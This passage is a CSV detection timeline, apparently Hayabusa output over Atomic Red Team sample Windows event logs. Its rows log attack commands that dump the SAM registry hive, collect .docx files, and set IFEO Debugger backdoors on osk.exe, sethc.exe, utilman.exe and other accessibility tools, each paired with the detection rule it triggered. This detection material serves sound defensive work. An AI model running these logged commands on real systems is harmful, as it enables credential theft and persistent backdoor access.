Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SAM sam.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | LID: 0x50951 | PID: 4140 | PGUID: 747F3D96-D885-5D31-0000-0010D11C3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D887-5D31-0000-0010D51F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D88F-5D31-0000-0010BD353200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command 
Prompt,,../hayabusa-rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-D890-5D31-0000-001012383200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,../hayabusa-rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .docx | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 6328 | PGUID: 
747F3D96-D890-5D31-0000-0010A5383200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1568 | PGUID: 747F3D96-D890-5D31-0000-0010FA3F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D890-5D31-0000-001085443200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1228 | PGUID: 747F3D96-D89A-5D31-0000-0010A46B3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: 
C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1132 | PGUID: 
747F3D96-D89A-5D31-0000-0010F2703200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 864 | PGUID: 747F3D96-D89F-5D31-0000-00106C7D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1860 | PGUID: 
747F3D96-D89F-5D31-0000-0010BD7F3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2404 | PGUID: 747F3D96-D89F-5D31-0000-0010BC823200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D8A2-5D31-0000-00108A8F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | 
PID: 2484 | PGUID: 747F3D96-D8A2-5D31-0000-0010D8943200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4212 | PGUID: 747F3D96-D8A5-5D31-0000-0010729B3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5000 | PGUID: 
747F3D96-D8A5-5D31-0000-0010C39D3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6116 | PGUID: 747F3D96-D8A5-5D31-0000-0010C0A03200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D8A6-5D31-0000-001053A73200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 
| PID: 6664 | PGUID: 747F3D96-D8A6-5D31-0000-0010F9B13200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D8A9-5D31-0000-001072C43200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5124 | PGUID: 
747F3D96-D8A9-5D31-0000-0010C0C63200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6016 | PGUID: 747F3D96-D8AA-5D31-0000-0010C0C93200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6244 | PGUID: 747F3D96-D8AB-5D31-0000-001054D03200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys 